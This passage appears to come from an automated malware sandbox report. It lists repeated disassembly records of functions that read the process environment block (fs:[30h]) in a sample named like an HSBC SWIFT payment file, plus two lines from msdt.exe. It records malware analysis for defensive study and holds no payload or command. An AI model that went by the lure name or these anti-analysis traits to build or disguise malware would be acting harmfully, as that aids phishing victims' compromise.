          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C3B7A mov eax, dword ptr fs:[00000030h]8_2_018C3B7A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C3B7A mov eax, dword ptr fs:[00000030h]8_2_018C3B7A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CD294 mov eax, dword ptr fs:[00000030h]8_2_018CD294
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CD294 mov eax, dword ptr fs:[00000030h]8_2_018CD294
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018952A5 mov eax, dword ptr fs:[00000030h]8_2_018952A5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018952A5 mov eax, dword ptr fs:[00000030h]8_2_018952A5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018952A5 mov eax, dword ptr fs:[00000030h]8_2_018952A5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018952A5 mov eax, dword ptr fs:[00000030h]8_2_018952A5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018952A5 mov eax, dword ptr fs:[00000030h]8_2_018952A5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AAAB0 mov eax, dword ptr fs:[00000030h]8_2_018AAAB0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AAAB0 mov eax, dword ptr fs:[00000030h]8_2_018AAAB0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CFAB0 mov eax, dword ptr fs:[00000030h]8_2_018CFAB0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2ACB mov eax, dword ptr fs:[00000030h]8_2_018C2ACB
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2AE4 mov eax, dword ptr fs:[00000030h]8_2_018C2AE4
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A8A0A mov eax, dword ptr fs:[00000030h]8_2_018A8A0A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195AA16 mov eax, dword ptr fs:[00000030h]8_2_0195AA16
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195AA16 mov eax, dword ptr fs:[00000030h]8_2_0195AA16
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B3A1C mov eax, dword ptr fs:[00000030h]8_2_018B3A1C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01895210 mov eax, dword ptr fs:[00000030h]8_2_01895210
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01895210 mov ecx, dword ptr fs:[00000030h]8_2_01895210
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01895210 mov eax, dword ptr fs:[00000030h]8_2_01895210
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01895210 mov eax, dword ptr fs:[00000030h]8_2_01895210
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189AA16 mov eax, dword ptr fs:[00000030h]8_2_0189AA16
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189AA16 mov eax, dword ptr fs:[00000030h]8_2_0189AA16
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D4A2C mov eax, dword ptr fs:[00000030h]8_2_018D4A2C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D4A2C mov eax, dword ptr fs:[00000030h]8_2_018D4A2C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA229 mov eax, dword ptr fs:[00000030h]8_2_018BA229
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195EA55 mov eax, dword ptr fs:[00000030h]8_2_0195EA55
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01924257 mov eax, dword ptr fs:[00000030h]8_2_01924257
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01899240 mov eax, dword ptr fs:[00000030h]8_2_01899240
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01899240 mov eax, dword ptr fs:[00000030h]8_2_01899240
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01899240 mov eax, dword ptr fs:[00000030h]8_2_01899240
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01899240 mov eax, dword ptr fs:[00000030h]8_2_01899240
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0194B260 mov eax, dword ptr fs:[00000030h]8_2_0194B260
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0194B260 mov eax, dword ptr fs:[00000030h]8_2_0194B260
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01968A62 mov eax, dword ptr fs:[00000030h]8_2_01968A62
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D927A mov eax, dword ptr fs:[00000030h]8_2_018D927A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01892D8A mov eax, dword ptr fs:[00000030h]8_2_01892D8A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01892D8A mov eax, dword ptr fs:[00000030h]8_2_01892D8A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01892D8A mov eax, dword ptr fs:[00000030h]8_2_01892D8A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01892D8A mov eax, dword ptr fs:[00000030h]8_2_01892D8A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01892D8A mov eax, dword ptr fs:[00000030h]8_2_01892D8A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2581 mov eax, dword ptr fs:[00000030h]8_2_018C2581
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2581 mov eax, dword ptr fs:[00000030h]8_2_018C2581
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2581 mov eax, dword ptr fs:[00000030h]8_2_018C2581
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2581 mov eax, dword ptr fs:[00000030h]8_2_018C2581
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CFD9B mov eax, dword ptr fs:[00000030h]8_2_018CFD9B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CFD9B mov eax, dword ptr fs:[00000030h]8_2_018CFD9B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C35A1 mov eax, dword ptr fs:[00000030h]8_2_018C35A1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C1DB5 mov eax, dword ptr fs:[00000030h]8_2_018C1DB5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C1DB5 mov eax, dword ptr fs:[00000030h]8_2_018C1DB5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C1DB5 mov eax, dword ptr fs:[00000030h]8_2_018C1DB5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019605AC mov eax, dword ptr fs:[00000030h]8_2_019605AC
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019605AC mov eax, dword ptr fs:[00000030h]8_2_019605AC
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916DC9 mov eax, dword ptr fs:[00000030h]8_2_01916DC9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916DC9 mov eax, dword ptr fs:[00000030h]8_2_01916DC9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916DC9 mov eax, dword ptr fs:[00000030h]8_2_01916DC9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916DC9 mov ecx, dword ptr fs:[00000030h]8_2_01916DC9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916DC9 mov eax, dword ptr fs:[00000030h]8_2_01916DC9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916DC9 mov eax, dword ptr fs:[00000030h]8_2_01916DC9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01948DF1 mov eax, dword ptr fs:[00000030h]8_2_01948DF1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AD5E0 mov eax, dword ptr fs:[00000030h]8_2_018AD5E0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AD5E0 mov eax, dword ptr fs:[00000030h]8_2_018AD5E0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195FDE2 mov eax, dword ptr fs:[00000030h]8_2_0195FDE2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195FDE2 mov eax, dword ptr fs:[00000030h]8_2_0195FDE2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195FDE2 mov eax, dword ptr fs:[00000030h]8_2_0195FDE2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195FDE2 mov eax, dword ptr fs:[00000030h]8_2_0195FDE2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01968D34 mov eax, dword ptr fs:[00000030h]8_2_01968D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0191A537 mov eax, dword ptr fs:[00000030h]8_2_0191A537
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195E539 mov eax, dword ptr fs:[00000030h]8_2_0195E539
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C4D3B mov eax, dword ptr fs:[00000030h]8_2_018C4D3B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C4D3B mov eax, dword ptr fs:[00000030h]8_2_018C4D3B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C4D3B mov eax, dword ptr fs:[00000030h]8_2_018C4D3B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189AD30 mov eax, dword ptr fs:[00000030h]8_2_0189AD30
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A3D34 mov eax, dword ptr fs:[00000030h]8_2_018A3D34
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D3D43 mov eax, dword ptr fs:[00000030h]8_2_018D3D43
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01913540 mov eax, dword ptr fs:[00000030h]8_2_01913540
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01943D40 mov eax, dword ptr fs:[00000030h]8_2_01943D40
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B7D50 mov eax, dword ptr fs:[00000030h]8_2_018B7D50
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BC577 mov eax, dword ptr fs:[00000030h]8_2_018BC577
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BC577 mov eax, dword ptr fs:[00000030h]8_2_018BC577
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A849B mov eax, dword ptr fs:[00000030h]8_2_018A849B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01968CD6 mov eax, dword ptr fs:[00000030h]8_2_01968CD6
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916CF0 mov eax, dword ptr fs:[00000030h]8_2_01916CF0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916CF0 mov eax, dword ptr fs:[00000030h]8_2_01916CF0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916CF0 mov eax, dword ptr fs:[00000030h]8_2_01916CF0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019514FB mov eax, dword ptr fs:[00000030h]8_2_019514FB
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951C06 mov eax, dword ptr fs:[00000030h]8_2_01951C06
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0196740D mov eax, dword ptr fs:[00000030h]8_2_0196740D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0196740D mov eax, dword ptr fs:[00000030h]8_2_0196740D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0196740D mov eax, dword ptr fs:[00000030h]8_2_0196740D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916C0A mov eax, dword ptr fs:[00000030h]8_2_01916C0A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916C0A mov eax, dword ptr fs:[00000030h]8_2_01916C0A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916C0A mov eax, dword ptr fs:[00000030h]8_2_01916C0A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01916C0A mov eax, dword ptr fs:[00000030h]8_2_01916C0A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CBC2C mov eax, dword ptr fs:[00000030h]8_2_018CBC2C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192C450 mov eax, dword ptr fs:[00000030h]8_2_0192C450
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192C450 mov eax, dword ptr fs:[00000030h]8_2_0192C450
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CA44B mov eax, dword ptr fs:[00000030h]8_2_018CA44B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B746D mov eax, dword ptr fs:[00000030h]8_2_018B746D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01917794 mov eax, dword ptr fs:[00000030h]8_2_01917794
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01917794 mov eax, dword ptr fs:[00000030h]8_2_01917794
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01917794 mov eax, dword ptr fs:[00000030h]8_2_01917794
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A8794 mov eax, dword ptr fs:[00000030h]8_2_018A8794
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D37F5 mov eax, dword ptr fs:[00000030h]8_2_018D37F5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192FF10 mov eax, dword ptr fs:[00000030h]8_2_0192FF10
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192FF10 mov eax, dword ptr fs:[00000030h]8_2_0192FF10
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CA70E mov eax, dword ptr fs:[00000030h]8_2_018CA70E
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CA70E mov eax, dword ptr fs:[00000030h]8_2_018CA70E
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0196070D mov eax, dword ptr fs:[00000030h]8_2_0196070D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0196070D mov eax, dword ptr fs:[00000030h]8_2_0196070D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BF716 mov eax, dword ptr fs:[00000030h]8_2_018BF716
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01894F2E mov eax, dword ptr fs:[00000030h]8_2_01894F2E
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01894F2E mov eax, dword ptr fs:[00000030h]8_2_01894F2E
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CE730 mov eax, dword ptr fs:[00000030h]8_2_018CE730
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AEF40 mov eax, dword ptr fs:[00000030h]8_2_018AEF40
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AFF60 mov eax, dword ptr fs:[00000030h]8_2_018AFF60
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01968F6A mov eax, dword ptr fs:[00000030h]8_2_01968F6A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192FE87 mov eax, dword ptr fs:[00000030h]8_2_0192FE87
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01960EA5 mov eax, dword ptr fs:[00000030h]8_2_01960EA5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01960EA5 mov eax, dword ptr fs:[00000030h]8_2_01960EA5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01960EA5 mov eax, dword ptr fs:[00000030h]8_2_01960EA5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019146A7 mov eax, dword ptr fs:[00000030h]8_2_019146A7
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01968ED6 mov eax, dword ptr fs:[00000030h]8_2_01968ED6
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C36CC mov eax, dword ptr fs:[00000030h]8_2_018C36CC
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D8EC7 mov eax, dword ptr fs:[00000030h]8_2_018D8EC7
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0194FEC0 mov eax, dword ptr fs:[00000030h]8_2_0194FEC0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A76E2 mov eax, dword ptr fs:[00000030h]8_2_018A76E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C16E0 mov ecx, dword ptr fs:[00000030h]8_2_018C16E0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189C600 mov eax, dword ptr fs:[00000030h]8_2_0189C600
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189C600 mov eax, dword ptr fs:[00000030h]8_2_0189C600
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189C600 mov eax, dword ptr fs:[00000030h]8_2_0189C600
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C8E00 mov eax, dword ptr fs:[00000030h]8_2_018C8E00
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CA61C mov eax, dword ptr fs:[00000030h]8_2_018CA61C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CA61C mov eax, dword ptr fs:[00000030h]8_2_018CA61C
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01951608 mov eax, dword ptr fs:[00000030h]8_2_01951608
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189E620 mov eax, dword ptr fs:[00000030h]8_2_0189E620
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0194FE3F mov eax, dword ptr fs:[00000030h]8_2_0194FE3F
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A7E41 mov eax, dword ptr fs:[00000030h]8_2_018A7E41
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A7E41 mov eax, dword ptr fs:[00000030h]8_2_018A7E41
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A7E41 mov eax, dword ptr fs:[00000030h]8_2_018A7E41
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A7E41 mov eax, dword ptr fs:[00000030h]8_2_018A7E41
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A7E41 mov eax, dword ptr fs:[00000030h]8_2_018A7E41
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A7E41 mov eax, dword ptr fs:[00000030h]8_2_018A7E41
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195AE44 mov eax, dword ptr fs:[00000030h]8_2_0195AE44
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195AE44 mov eax, dword ptr fs:[00000030h]8_2_0195AE44
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A766D mov eax, dword ptr fs:[00000030h]8_2_018A766D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BAE73 mov eax, dword ptr fs:[00000030h]8_2_018BAE73
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BAE73 mov eax, dword ptr fs:[00000030h]8_2_018BAE73
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BAE73 mov eax, dword ptr fs:[00000030h]8_2_018BAE73
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BAE73 mov eax, dword ptr fs:[00000030h]8_2_018BAE73
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BAE73 mov eax, dword ptr fs:[00000030h]8_2_018BAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05453D43 mov eax, dword ptr fs:[00000030h]20_2_05453D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 20_2_05493540 mov eax, dword ptr fs:[00000030h]20_2_05493540
